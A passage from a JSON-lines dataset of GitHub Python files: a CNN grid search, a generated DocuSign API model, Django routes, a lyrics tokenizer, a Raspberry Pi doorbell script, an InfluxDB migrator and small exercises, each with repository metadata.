test_blockchain(block_chain)\n","repo_name":"reneang17/data-structures-and-algorithms","sub_path":"show-me-the-data-structures/5_Blockchain_with_Linkedlist.py","file_name":"5_Blockchain_with_Linkedlist.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20328894080","text":"import statistics \nimport traceback\nimport pickle\n\nimport warnings\nimport os\n\nfrom sklearn.model_selection import KFold\nfrom keras.preprocessing.image import ImageDataGenerator\n\nfrom models.cnn_builder import CNNBuilder\nfrom evaluation.multi_run_evaluation import MultiRunEvaluation\n\n# Removing some deprecationwanings from output that disturb experiment report.\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \n\n\nclass GridSearch:\n \"\"\"\n This class implements grid search for CNN models. It enables testing different configurations of convolutional and fully connected layers. \n \n Other training parameters are fixed based on previous experiments (see overfitting_experimentation.ipynb)\n \"\"\"\n\n filename = \"evaluation/experiment_records/grid_search-{}_{}.pickle\"\n test_filename = \"tests/grid_search-{}_{}.pickle\"\n\n\n def __init__(\n self,\n in_shape,\n out_shape,\n convolutional_options,\n fully_connected_options,\n epochs=100,\n nr_runs=10,\n nr_splits=10,\n is_test=False\n ):\n \"\"\"\n Configures the grid search.\n\n Each configuration will be tested for nr_runs * nr_splits times with max 100 epochs for each time.\n\n Parameters:\n in_shape -- the shape of the input of the network\n out_shape -- the shape of the output of the network\n convolutional_options -- A list of options for convolutional layers that are tested. This corresponds to the parameter \"convolutional_layers\" of the CNNBuilder\n fully_connected_options -- A list of options for fully connected layers that are tested. This corresponds to the parameter \"convolutional_layers\" of the CNNBuilder\n epochs -- nr of epochs to run\n nr_runs -- the number of runs to execute for each split\n nr_splits -- the number of splits for the dataset.\n \"\"\"\n self.in_shape = in_shape\n self.out_shape = out_shape\n self.convolutional_options = convolutional_options\n self.fully_connected_options = fully_connected_options\n self.epochs = epochs\n self.nr_runs = nr_runs\n self.nr_splits = nr_splits\n self.is_test = is_test\n self.scores = list()\n\n\n def run(self, X, y) -> list:\n \"\"\"\n Runs grid search. \n The search tests all combinations of convolutional and fully connected shapes. For each of them it performs 10-fold cross validation and uses the average hamming score of the test set over all splits as comparison score.\n The search stores checkpoints in evaluation/experiment_records/grid_search.pickle\n\n Parameters:\n X -- the training data. \n y -- labels of the training data.\n Returns:\n A list of all tried combinations and their scores as tuple (cnn_configuration, fully connected conciguration, score). The list is sorted by score.\n \"\"\"\n print(\"\\n\\nRUNNING GRID SEARCH ...\")\n\n results = dict()\n checkpoint = self.load_checkpoint()\n\n print(f\"checkpoint: {checkpoint}\")\n\n if checkpoint:\n results[\"checkpoint\"] = checkpoint\n result_length = len(results[\"checkpoint\"])\n\n print(f\"Existing checkpoint loaded with {result_length} entries\")\n\n kfold = KFold(n_splits=self.nr_splits, shuffle=True)\n\n for cnn_config in self.convolutional_options:\n for fc_config in self.fully_connected_options:\n print(\"\\nTesting configuration:\")\n print(f\" - Convolutional part: {cnn_config}\")\n print(f\" - Connected part: {fc_config}\")\n\n\n # Check to avoid retesting a tested combination:\n config_key = \"(\"+str(cnn_config) + \",\" + str(fc_config) + \")\"\n\n if config_key in results.keys():\n print(\"Skipping - already tested in checkpoint\")\n continue\n\n test_hammings = []\n split_counter = 1\n\n for train_indices, test_indices in kfold.split(X=X):\n try:\n print(f\"\\nSplit {split_counter}/{self.nr_splits}\")\n split_counter+=1\n\n X_train = X[train_indices]\n y_train = y[train_indices]\n X_test = X[test_indices]\n y_test = y[test_indices]\n\n train_datagen = ImageDataGenerator(\n rotation_range=30, \n width_shift_range=0.1, \n height_shift_range=0.1, \n fill_mode=\"nearest\"\n )\n train_generator = train_datagen.flow(x=X_train, y=y_train)\n\n cnn_builder = CNNBuilder(\n convolutional_layers=cnn_config,\n fully_connected_layers=fc_config,\n in_shape=(self.in_shape),\n out_shape=self.out_shape\n )\n\n evaluator = MultiRunEvaluation(model_creation=cnn_builder.build_model)\n evaluator.evaluate(\n nr_runs=self.nr_runs,\n epochs=self.epochs,\n early_stopping_patience=5,\n train_generator=train_generator,\n X_train=X_train,\n y_train=y_train,\n X_test=X_test,\n y_test=y_test,\n verbose = 0\n )\n\n mean_test_hamming = MultiRunEvaluation.get_metrics_summary(\n values=evaluator.get_test_hamming_scores()\n )[\"mean\"]\n test_hammings.append(mean_test_hamming)\n\n # cleanup. \n del X_train\n del y_train\n del X_test\n del y_test\n del train_datagen\n del train_generator\n del cnn_builder\n del evaluator\n\n except Exception as e:\n print(\"An exception occurred:\")\n traceback.print_exc()\n print(\"Resuming with next test...\")\n\n score = statistics.mean(data=test_hammings)\n print(f\"Score: {score}\")\n \n # update results and make a checkpoint\n results[config_key] = (cnn_config, fc_config, score)\n self.store_checkpoint(checkpoint=results)\n \n\n scores = list(results.values())\n\n scores.sort(key=lambda tup: tup[2], reverse=True)\n return scores\n\n\n def store_checkpoint(self, checkpoint) -> None:\n \"\"\"\n store a checkpint of the current results to a file where it can be loaded from if the experiment is interrupted\n \n Parameters:\n checkpoint -- The checkpoint data to be stored.\n \"\"\"\n filename = GridSearch.filename.format(\n str(self.convolutional_options),\n str(self.fully_connected_options)\n )\n if self.is_test:\n filename = GridSearch.test_filename.format(\n str(self.convolutional_options),\n str(self.fully_connected_options)\n )\n \n with open(filename,\"wb\") as f:\n pickle.dump(checkpoint,f,pickle.HIGHEST_PROTOCOL)\n\n\n def load_checkpoint(self) -> list | None:\n \"\"\"\n load the last checkpoint\n \"\"\"\n filename = GridSearch.filename.format(\n str(self.convolutional_options),\n str(self.fully_connected_options)\n )\n\n if self.is_test:\n filename = GridSearch.test_filename.format(\n str(self.convolutional_options),\n str(self.fully_connected_options)\n )\n\n if os.path.exists(path=filename):\n with open(file=filename, mode=\"rb\") as f:\n results = pickle.load(file=f)\n return results\n else:\n print(f\"Checkpoint file {filename} does not exist!\") \n return None\n\n\n def remove_checkpoint(self) -> None:\n \"\"\"\n clean up the checkpoint data if it is not needed any more.\n \"\"\"\n filename = GridSearch.filename.format(\n str(self.convolutional_options),\n str(self.fully_connected_options)\n )\n if self.is_test:\n filename = GridSearch.test_filename.format(\n str(self.convolutional_options),\n str(self.fully_connected_options)\n )\n \n if os.path.exists(path=filename):\n os.remove(path=filename)\n","repo_name":"frank-trollmann/machine-learning_example-project","sub_path":"evaluation/grid_search.py","file_name":"grid_search.py","file_ext":"py","file_size_in_byte":9097,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"36982250990","text":"# coding: utf-8\n\n\"\"\"\n DocuSign REST API\n\n The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign.\n\n OpenAPI spec version: v2\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass ServiceVersion(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self, version=None, version_url=None):\n \"\"\"\n ServiceVersion - a model defined in Swagger\n\n :param dict swaggerTypes: The key is attribute name\n and the value is attribute type.\n :param dict attributeMap: The key is attribute name\n and the value is json key in definition.\n \"\"\"\n self.swagger_types = {\n 'version': 'str',\n 'version_url': 'str'\n }\n\n self.attribute_map = {\n 'version': 'version',\n 'version_url': 'versionUrl'\n }\n\n self._version = version\n self._version_url = version_url\n\n @property\n def version(self):\n \"\"\"\n Gets the version of this ServiceVersion.\n The version of the rest API.\n\n :return: The version of this ServiceVersion.\n :rtype: str\n \"\"\"\n return self._version\n\n @version.setter\n def version(self, version):\n \"\"\"\n Sets the version of this ServiceVersion.\n The version of the rest API.\n\n :param version: The version of this ServiceVersion.\n :type: str\n \"\"\"\n\n self._version = version\n\n @property\n def version_url(self):\n \"\"\"\n Gets the version_url of this ServiceVersion.\n \n\n :return: The version_url of this ServiceVersion.\n :rtype: str\n \"\"\"\n return self._version_url\n\n @version_url.setter\n def version_url(self, version_url):\n \"\"\"\n Sets the version_url of this ServiceVersion.\n \n\n :param version_url: The version_url of this ServiceVersion.\n :type: str\n \"\"\"\n\n self._version_url = version_url\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","repo_name":"Alying/Fire-Detector","sub_path":"docusign_tools/docusign_esign/models/service_version.py","file_name":"service_version.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"75"} +{"seq_id":"14640125269","text":"import sys\n\n#print(len(sys.argv))\nfor i in range(1,len(sys.argv)):\n print(\"arg \", i, \": \", sys.argv[i])\n\nstates = [\"California\", \"Oregon\",\n \"Washington\", \"Texas\"]\n\nfor count, state in enumerate(states):\n print(\"state \", count, \": \", state)\n","repo_name":"CristianColdea/LCTHW","sub_path":"ex13.py","file_name":"ex13.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21347527296","text":"import numpy as np \nimport tensorflow as tf \n\nfrom model.input_data import InputImageProc\nfrom model.cnn import CNN\n\nif __name__ == '__main__':\n input_proc = InputImageProc()\n input_proc()\n\n train_img = np.load('./datasets/train/dataset.npy')\n train_label = np.load('./datasets/train/label_list.npy')\n \n create_model = CNN()\n cnn = create_model.cnn()\n cnn.fit(train_img, train_label, epochs=5)\n cnn.save('./model/ckpt/')\n\n valid_img = np.load('./datasets/valid/dataset.npy')\n valid_label = np.load('./datasets/valid/label_list.npy')\n valid_loss, valid_acc = cnn.evaluate(valid_img, valid_label, verbose=2)","repo_name":"shigematsu10/trace_classifier","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33729112938","text":"from django.shortcuts import render, redirect\nfrom .models import Phone\n\ndef show_catalog(request):\n template = 'catalog.html'\n sort = request.GET.get('sort')\n all_phones = Phone.objects.all()\n if sort == 'name':\n all_phones = all_phones.order_by('name')\n elif sort == 'max_price':\n all_phones = all_phones.order_by('-price')\n elif sort == 'min_price':\n all_phones = all_phones.order_by('price')\n context = {'phones': all_phones}\n return render(request, template, context)\n\n\ndef show_product(request, slug):\n template = 'product.html'\n model = Phone.objects.get(slug__contains=slug)\n context = {'phone': model}\n return render(request, template, context)","repo_name":"Olesyazfc/django_homework","sub_path":"2.1-databases/work_with_database/phones/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20165748346","text":"class Solution: \n def isValid(self, s:str) -> bool:\n \n stack = []\n brackets = { '}' : '{', ']' : '[', ')' : '(' }\n\n for chars in s: \n if chars in brackets:\n if stack and stack[-1] == brackets[chars]: \n stack.pop()\n else:\n return False\n else:\n stack.append(chars)\n return True if not stack else False","repo_name":"johnsroy/codingPractice","sub_path":"Easy/validParenthesis.py","file_name":"validParenthesis.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13504380299","text":"\"\"\"conf URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib.auth.views import LogoutView\n\nfrom work import views\n\nhandler404 = views.custom_handler404\nhandler500 = views.custom_handler500\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.main_view),\n path('vacancies/', views.vacancies),\n path('vacancies/cat/', views.speciality),\n path('vacancies/', views.vacancy),\n path('companies/', views.company),\n path('login/', views.user_login, name='login'),\n path('register/', views.register, name='register'),\n path('logout/', LogoutView.as_view(), name='logout'),\n path('vacancies//send/', views.send, name='send'),\n path('mycompany/', views.mycompany, name='mycompany'),\n path('mycompany//', views.company_edit, name='company_edit'),\n path('mycompany/new/', views.company_new, name='company_new'),\n path('mycompany/vacancies/', views.vacancy_list, name='vacancy_list'),\n path('mycompany/vacancies/new/', views.vacancy_new, name='vacancy_new'),\n path('mycompany/vacancies//', views.vacancy_edit, name='vacancy_edit')\n ]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"kirandev01/Stepic_4_week","sub_path":"conf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39795676330","text":"#P4E7 JAVIER DURAN Pide una fecha, valida si es una fecha correcta y en caso \r\n# de serlo le he añadido al ejercicio que cambie el mes alfabeticamente.\r\n\r\ndia=int(input(\"Introduce un día:\"))\r\nmes=int(input(\"Introduce mes:\"))\r\naño=int(input(\"Introduce el año:\"))\r\nmesalpha={1:\"Enero\",2:\"Febrero\",3:\"Marzo\",4:\"Abril\",5:\"Mayo\",6:\"Junio\",7:\"Julio\",8:\"Agosto\",9:\"Septiembre\",10:\"Octubre\",11:\"Noviembre\",12:\"Diciembre\"}\r\nif mes>12 or año>2019 or(mes%2==0 and dia>=31 and mes<7) or (mes%2==1 and dia>=31 and mes>7):\r\n print(\"Fecha invalida\")\r\n\r\nelse:\r\n print(\"La fecha seleccionada es {} de {} del año {}\".format(dia,mesalpha[mes],año))","repo_name":"javivi595/practica3","sub_path":"Practica 3/P3E7.py","file_name":"P3E7.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12269960816","text":"import pandas as pd\nimport codecs\n\nfilename = \"jawiki-country.json.gz\"\ndf = pd.read_json(filename,compression='infer',lines=True)\n\nfilter = df[\"title\"] == \"イギリス\"\n\nans = df[filter].values\nans = ans[0][1]\nprint(ans)\n\nprint(ans,file=codecs.open('UK.txt', 'w', 'utf-8'))\n","repo_name":"twobooks/nlp100training","sub_path":"020.py","file_name":"020.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31736721472","text":"from simulation import Simulation\nfrom collections import OrderedDict\nimport matplotlib.pyplot as plt\nfrom numpy import linspace\n\nclass GraphSimulation(Simulation):\n def __init__(self, *args, **kwargs):\n Simulation.__init__(self, *args, **kwargs)\n self._lenses = OrderedDict()\n self._lens_index = {}\n self._lens_locked = False\n def pre_sim_routine(self, *args):\n super().pre_sim_routine(*args)\n self._lens_locked = True\n def add_lens(self, name, extractor):\n if self._lens_locked:\n raise ValueError('Locked, cannot add any more lenses now')\n if name in self._lenses:\n raise ValueError(f'Lens \"{name}\" already registered')\n self._lenses[name] = extractor\n self._lens_index[name] = len(self._lens_index)\n def add_lenses(self, lenses):\n for name, extractor in lenses:\n self.add_lens(name, extractor)\n\n def slice_data(self, xs, state, error): return [extr(xs, state, error) for extr in self._lenses.values()]\n\n def extract_dataline(self, name):\n if name not in self._lenses:\n raise KeyError(f'Unknown lens \"{name}\"')\n return self.recorded_data[:, self._lens_index[name]]\n\n def plot(self, *names, start=0):\n xs = linspace(start, start + self.total_time, num=self.steps)\n for name in names:\n dataline = self.extract_dataline(name)\n label_name = name\n # Force TeX if elements are used and it is not invoked\n if '^' in name or '\\\\' in name or '_' in name:\n if '$' not in name:\n label_name = f'${name}$'\n plt.plot(xs, dataline, label=label_name)\n plt.legend()\n return plt\n\nerr_ext = lambda xs, state, err: err\nxs_ext = lambda index: lambda xs, state, err: xs[index]\nstate_ext = lambda key: lambda xs, state, err: state[key]\n\n# Example:\n#s = GraphSimulation('exp', *make_exponent(exponents))\n#s.add_lenses([f'{e}^x', xs_ext(i)] for i, e in enumerate(exponents))\n#s.simulate(steps=100, total_time=2)\n#s.plot('1^x', '2^x', '3^x', '4^x', start=1)\n\n\n\n","repo_name":"Yetikoy/variety","sub_path":"src/graph_simulation.py","file_name":"graph_simulation.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20843857071","text":"#!/usr/bin/env python3\n\n# Train a classifier (?)\n\nimport csv\nimport spacy\nfrom collections import Counter\n\ndata = []\nwith open(\"my_data.csv\", 'r') as dat:\n csvreader = csv.reader(dat)\n header = next(csvreader)\n for row in csvreader:\n data.append(row)\n\ncnt = Counter()\nfor song in data:\n cnt[song[0]] += 1\n\n#print(cnt.most_common())\n# Rock: 94992 songs\n# Pop: 53858 songs\n# Rap: 17114 songs\n# Dance: 11895 songs\n# Country: 10630 songs\n\ndef get_only_genre(data, genre):\n songs = []\n for song in data:\n if song[0].lower() == genre.lower():\n songs.append(song)\n return songs\n\n\n\nrap_data = get_only_genre(data, 'rap')\nrock_data = get_only_genre(data, 'rock')\npop_data = get_only_genre(data, 'pop')\ncountry_data = get_only_genre(data, 'country')\ndance_data = get_only_genre(data, 'dance')\n\n\n\n# Tokenize\n# Split and train on Words\n# Or sentences\n\n\"\"\"\n This next part of code will closely follow the code from the class lecture\n on classification from 03-31-2022.\n\"\"\"\n\n\nnlp = spacy.load(\"en_core_web_sm\")\n# this line should make it not split on apostrophes\nnlp.tokenizer.rules = {key: value for key, value in nlp.tokenizer.rules.items() if \"'\" not in key and \"’\" not in key and \"‘\" not in key}\n\n# A function to get all the songs for a specific genre\n# the 'sentences' from the in class example will be the songs\n# where the 'authors' will be the genre\n\n\n# seperate songs by genre before this lol\ndef get_songs(data, genre: str) -> list:\n songs = []\n for song in data:\n lyrics = song[3]\n lyrics = lyrics.replace(\"\\n\", \". \").replace(\"--\", \" -- \")\n #lyrics = lyrics.replace(\"'\", \"\")\n #lyrics is a string of the lyrics\n \n tokens = [token.text for token in nlp(lyrics)\n if not(token.text.isspace()\n or\n token.is_punct)]\n song_string = \" \".join(tokens)\n songs.append(song_string)\n filename = genre+\"_lyrics.txt\"\n with open(filename, \"w\") as outfile:\n outfile.write(\"\\n\".join(songs))\n # tokens are written to a .txt output file where each line is a new token\n # not sure if this is the best way to do it as not seperated by song\n\n'''this will eventually be used to create the tokens for the test data'''\n\n\n'''\nsongs.extend(tokens)\nwrite file with name 'genre' that contains songs\n'''\n\n'''\n going forward this function will instead just create a list of every token\n in all songs and then write that list to a .txt file which will then be\n used to train the model rather than running and keeping the results\n contained in this file.\n'''\nprint('Starting Rap songs!')\nrap_songs = get_songs(rap_data, 'rap')\n\nprint('\\nDone with Rap songs...Moving onto Rock!\\n')\nrock_songs = get_songs(rock_data, 'rock')\n\nprint('\\nDone with Rock songs...Moving onto Country!\\n')\ncountry_songs = get_songs(country_data, 'country')\n\nprint('\\nDone with Country songs...Moving onto Dance!\\n')\ndance_songs = get_songs(dance_data, 'dance')\n\nprint('\\nDone with Dance songs...Moving onto Pop!\\n')\npop_songs = get_songs(pop_data, 'pop')\n\n#print(len(rock_songs))\n\n#print(\"\\nRap Songs:\")\n#print(rap_songs)\n\n#print(\"\\nRock Songs:\")\n#print(rock_songs)\n\n#print(\"\\nCountry Songs:\")\n#print(country_songs)\n\n#print(\"\\nDance Songs:\")\n#print(dance_songs)\n\n#print(\"\\nPop Songs:\")\n#print(pop_songs)\n\n#print(pop_data[4][3])\n","repo_name":"agulick1/Genre-Classification","sub_path":"code/get_tokens.py","file_name":"get_tokens.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20419216215","text":"\"\"\"Script to convert an old-structure influxdb to a new one.\"\"\"\n\nimport argparse\nimport sys\n\nfrom typing import List\n\n\n# Based on code at\n# http://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console\ndef print_progress(iteration: int, total: int, prefix: str = '',\n suffix: str = '', decimals: int = 2,\n bar_length: int = 68) -> None:\n \"\"\"Print progress bar.\n\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : number of decimals in percent complete (Int)\n barLength - Optional : character length of bar (Int)\n \"\"\"\n filled_length = int(round(bar_length * iteration / float(total)))\n percents = round(100.00 * (iteration / float(total)), decimals)\n line = '#' * filled_length + '-' * (bar_length - filled_length)\n sys.stdout.write('%s [%s] %s%s %s\\r' % (prefix, line,\n percents, '%', suffix))\n sys.stdout.flush()\n if iteration == total:\n print(\"\\n\")\n\n\ndef run(script_args: List) -> int:\n \"\"\"Run the actual script.\"\"\"\n from influxdb import InfluxDBClient\n\n parser = argparse.ArgumentParser(\n description=\"Migrate legacy influxDB.\")\n parser.add_argument(\n '-d', '--dbname',\n metavar='dbname',\n required=True,\n help=\"InfluxDB database name\")\n parser.add_argument(\n '-H', '--host',\n metavar='host',\n default='127.0.0.1',\n help=\"InfluxDB host address\")\n parser.add_argument(\n '-P', '--port',\n metavar='port',\n default=8086,\n help=\"InfluxDB host port\")\n parser.add_argument(\n '-u', '--username',\n metavar='username',\n default='root',\n help=\"InfluxDB username\")\n parser.add_argument(\n '-p', '--password',\n metavar='password',\n default='root',\n help=\"InfluxDB password\")\n parser.add_argument(\n '-s', '--step',\n metavar='step',\n default=1000,\n help=\"How many points to migrate at the same time\")\n parser.add_argument(\n '-o', '--override-measurement',\n metavar='override_measurement',\n default=\"\",\n help=\"Store all your points in the same measurement\")\n parser.add_argument(\n '-D', '--delete',\n action='store_true',\n default=False,\n help=\"Delete old database\")\n parser.add_argument(\n '--script',\n choices=['influxdb_migrator'])\n\n args = parser.parse_args()\n\n # Get client for old DB\n client = InfluxDBClient(args.host, args.port,\n args.username, args.password)\n client.switch_database(args.dbname)\n # Get DB list\n db_list = [db['name'] for db in client.get_list_database()]\n # Get measurements of the old DB\n res = client.query('SHOW MEASUREMENTS')\n measurements = [measurement['name'] for measurement in res.get_points()]\n nb_measurements = len(measurements)\n # Move data\n # Get old DB name\n old_dbname = \"{}__old\".format(args.dbname)\n # Create old DB if needed\n if old_dbname not in db_list:\n client.create_database(old_dbname)\n # Copy data to the old DB\n print(\"Cloning from {} to {}\".format(args.dbname, old_dbname))\n for index, measurement in enumerate(measurements):\n client.query('''SELECT * INTO {}..:MEASUREMENT FROM '''\n '\"{}\" GROUP BY *'.format(old_dbname, measurement))\n # Print progress\n print_progress(index + 1, nb_measurements)\n\n # Delete the database\n client.drop_database(args.dbname)\n # Create new DB if needed\n client.create_database(args.dbname)\n client.switch_database(old_dbname)\n # Get client for new DB\n new_client = InfluxDBClient(args.host, args.port, args.username,\n args.password, args.dbname)\n # Counter of points without time\n point_wt_time = 0\n\n print(\"Migrating from {} to {}\".format(old_dbname, args.dbname))\n # Walk into measurement\n for index, measurement in enumerate(measurements):\n\n # Get tag list\n res = client.query('''SHOW TAG KEYS FROM \"{}\"'''.format(measurement))\n tags = [v['tagKey'] for v in res.get_points()]\n # Get field list\n res = client.query('''SHOW FIELD KEYS FROM \"{}\"'''.format(measurement))\n fields = [v['fieldKey'] for v in res.get_points()]\n # Get points, convert and send points to the new DB\n offset = 0\n while True:\n nb_points = 0\n # Prepare new points\n new_points = []\n # Get points\n res = client.query('SELECT * FROM \"{}\" LIMIT {} OFFSET '\n '{}'.format(measurement, args.step, offset))\n for point in res.get_points():\n new_point = {\"tags\": {},\n \"fields\": {},\n \"time\": None}\n if args.override_measurement:\n new_point[\"measurement\"] = args.override_measurement\n else:\n new_point[\"measurement\"] = measurement\n # Check time\n if point[\"time\"] is None:\n # Point without time\n point_wt_time += 1\n print(\"Can not convert point without time\")\n continue\n # Convert all fields\n for field in fields:\n try:\n new_point[\"fields\"][field] = float(point[field])\n except (ValueError, TypeError):\n if field == \"value\":\n new_key = \"state\"\n else:\n new_key = \"{}_str\".format(field)\n new_point[\"fields\"][new_key] = str(point[field])\n # Add tags\n for tag in tags:\n new_point[\"tags\"][tag] = point[tag]\n # Set time\n new_point[\"time\"] = point[\"time\"]\n # Add new point to the new list\n new_points.append(new_point)\n # Count nb points\n nb_points += 1\n\n # Send to the new db\n try:\n new_client.write_points(new_points)\n except Exception as exp:\n raise exp\n\n # If there is no points\n if nb_points == 0:\n # print(\"Measurement {} migrated\".format(measurement))\n break\n else:\n # Increment offset\n offset += args.step\n # Print progress\n print_progress(index + 1, nb_measurements)\n\n # Delete database if needed\n if args.delete:\n print(\"Dropping {}\".format(old_dbname))\n client.drop_database(old_dbname)\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/homeassistant/scripts/influxdb_migrator.py","file_name":"influxdb_migrator.py","file_ext":"py","file_size_in_byte":7047,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"4998377106","text":"#!/usr/bin/python2.7\nimport RPi.GPIO as GPIO\nimport time\nimport os\nfrom setproctitle import setproctitle\n\npin = 22\n\ndef bell(pin):\n time.sleep(0.05)\n if not GPIO.input(pin):\n os.system(\"mpg123 bell.mp3\")\n\ndef initialize():\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pin,GPIO.IN)\n\n GPIO.add_event_detect(22, GPIO.FALLING, callback=bell, bouncetime=300)\n #GPIO.add_event_callback(22, callback=bell, bouncetime=300)\n\nif __name__ == '__main__':\n setproctitle('pi-ringbell')\n initialize()\n\n while True:\n time.sleep(0.05)\n\n","repo_name":"rimek/pi-tools","sub_path":"ringbell/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35846242540","text":"from random import choice\n\n\ndef wrd():\n with open(\"liste.de.mots.francais.sansaccents.txt\", \"r\") as f:\n line = f.readlines()\n word = choice(line).strip()\n return word\n\n\ndef cacher(word):\n cacher = []\n for i in range(1, len(word) + 1):\n cacher.append(\"_ \")\n return cacher\n\n\ndef verification(lettre, lst):\n while lettre in lst:\n print(\"Vous avez déjà entrer cette lettre.\")\n lettre = input(\"choississez une lettre: \")\n if lettre not in lst:\n lst += lettre\n return lettre\n","repo_name":"mathiscapart/Pendu_console","sub_path":"wrd.py","file_name":"wrd.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70049000562","text":"n, m = map(int, input().split())\n\n\ndef dfs(cnt=0, idx=1, res=\"\"):\n global n, m\n if m == cnt:\n print(res)\n return\n for i in range(idx, n+1):\n dfs(cnt+1, i, res+str(i)+' ')\n\n\ndfs()\n","repo_name":"SINHOLEE/Algorithm","sub_path":"python/beckjun/15651_n과m(3).py","file_name":"15651_n과m(3).py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2591200863","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n# Python 3.7\n\n#\n# @Author: *\n# @License: *\n# @Date: *\n# @Version: *\n# @Purpose: linear regresssion with scikit-learn. \n# Data used is random.gauss \n#\n\nfrom sklearn import linear_model\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\nrandom.seed(0)\nfig, ax = plt.subplots(figsize=(5, 5))\nplt.grid(True, linestyle='--', linewidth=0.1, alpha=0.7)\n\n#----------------------------------------------------------------------------------------#\n# Step 1: training data\nX = [i for i in range(100)]\nY = [random.gauss(x,10) for x in X]\n\nX = np.asarray(X)[:,np.newaxis]\nY = np.asarray(Y)[:,np.newaxis]\n\nplt.scatter(X,Y)\n\n# #----------------------------------------------------------------------------------------#\n# # Step 2: define and train a model\n\nmodel = linear_model.LinearRegression()\nmodel.fit(X, Y)\n\n# print(model.score(X, Y)) # R²\n# print(model.coef_, model.intercept_) # \n\n# #----------------------------------------------------------------------------------------#\n# # Step 3: prediction\nplt.plot(X, model.predict(X), color='black', linewidth=3, label=\"y = \" + str(round(model.coef_[0][0], 2)) + \"x + \" + str(round(model.intercept_[0], 2)) + \", R²=\" + str(round(model.score(X, Y), 2)))\n\n\nplt.xlabel('x')\nplt.ylabel('y')\nplt.legend(loc=\"best\")\nplt.savefig(\"simple_linear_regression.svg\", bbox_inches='tight')\n# plt.savefig(\"simple_linear_regression.pdf\", bbox_inches='tight')","repo_name":"Jxtopher/experimentations","sub_path":"Random gauss 